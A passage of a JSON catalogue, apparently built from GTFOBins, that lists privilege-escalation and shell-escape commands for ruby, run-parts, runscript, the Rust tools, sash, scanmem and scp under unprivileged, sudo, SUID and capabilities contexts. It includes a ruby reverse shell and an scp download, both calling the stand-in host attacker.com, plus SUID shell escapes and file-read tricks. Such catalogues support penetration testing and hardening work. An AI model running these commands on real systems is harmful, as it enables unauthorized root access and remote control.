installation","aliases":[]},{"id":"gtfo:ruby:library-load:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:reverse-shell:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"attacker.com\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:reverse-shell:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"attacker.com\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:shell:0:capabilities","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ruby -e 'Process::Sys.setuid(0); exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:shell:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ruby -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:shell:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ruby -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:upload:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ruby -run -e httpd . -p 80","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ruby:upload:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ruby -run -e httpd . -p 80","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-mailcap:inherit:0:sudo","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"run-mailcap --action=view text/plain:/etc/hosts","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-mailcap:inherit:0:unprivileged","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"run-mailcap --action=view text/plain:/etc/hosts","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-mailcap:inherit:1:sudo","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"run-mailcap --action=edit text/plain:/path/to/output-file","description":"The file must exist and be not empty.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-mailcap:inherit:1:unprivileged","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"run-mailcap --action=edit text/plain:/path/to/output-file","description":"The file must exist and be not empty.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:0:sudo","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:0:suid","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin --arg='-p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:0:unprivileged","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:1:sudo","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:1:suid","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/ --arg='-p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:run-parts:shell:1:unprivileged","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-parts/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:runscript:shell:0:sudo","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/runscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:runscript:shell:0:suid","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/runscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:runscript:shell:0:unprivileged","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/runscript/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:file-read:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustc /path/to/input-file","description":"The compiler leaks some file lines in the compiler error.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:file-read:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustc /path/to/input-file","description":"The compiler leaks some file lines in the compiler error.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:file-write:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo 'fn main() { println!(\"DATA\"); }' >/path/to/temp-file\nrustc /path/to/temp-file -o /path/to/output-file","description":"The comment appears in the compiled program.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:file-write:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo 'fn main() { println!(\"DATA\"); }' >/path/to/temp-file\nrustc /path/to/temp-file -o /path/to/output-file","description":"The comment appears in the compiled program.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:inherit:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"rustc --explain E0001","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustc:inherit:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"rustc --explain E0001","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustdoc:file-read:0:sudo","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustdoc /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustdoc:file-read:0:unprivileged","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustdoc /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustdoc:file-write:0:sudo","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo '//! DATA' >/path/to/temp-file\nrustdoc /path/to/temp-file -o /path/to/output-dir/","description":"This command creates a number of documentation files in the target directory, and the data is written in multiple locations, e.g., `src/temp_file/temp-file.html`, amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustdoc:file-write:0:unprivileged","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo '//! DATA' >/path/to/temp-file\nrustdoc /path/to/temp-file -o /path/to/output-dir/","description":"This command creates a number of documentation files in the target directory, and the data is written in multiple locations, e.g., `src/temp_file/temp-file.html`, amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustdoc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustfmt:file-read:0:sudo","toolId":"gtfo:rustfmt","toolName":"rustfmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustfmt /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustfmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustfmt:file-read:0:unprivileged","toolId":"gtfo:rustfmt","toolName":"rustfmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustfmt /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustfmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustup:command:0:sudo","toolId":"gtfo:rustup","toolName":"rustup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\necho '/path/to/command' >/path/to/temp-dir/bin/rustc\nchmod +x /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustup:command:0:unprivileged","toolId":"gtfo:rustup","toolName":"rustup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\necho '/path/to/command' >/path/to/temp-dir/bin/rustc\nchmod +x /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustup:shell:0:sudo","toolId":"gtfo:rustup","toolName":"rustup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\ncp /bin/sh /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rustup:shell:0:unprivileged","toolId":"gtfo:rustup","toolName":"rustup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\ncp /bin/sh /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sash:shell:0:sudo","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sash:shell:0:suid","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sash:shell:0:unprivileged","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scanmem:shell:0:sudo","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scanmem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scanmem:shell:0:suid","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scanmem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scanmem:shell:0:unprivileged","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scanmem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:download:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:download:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:download:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:1:sudo","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:1:suid","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:scp:shell:1:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x 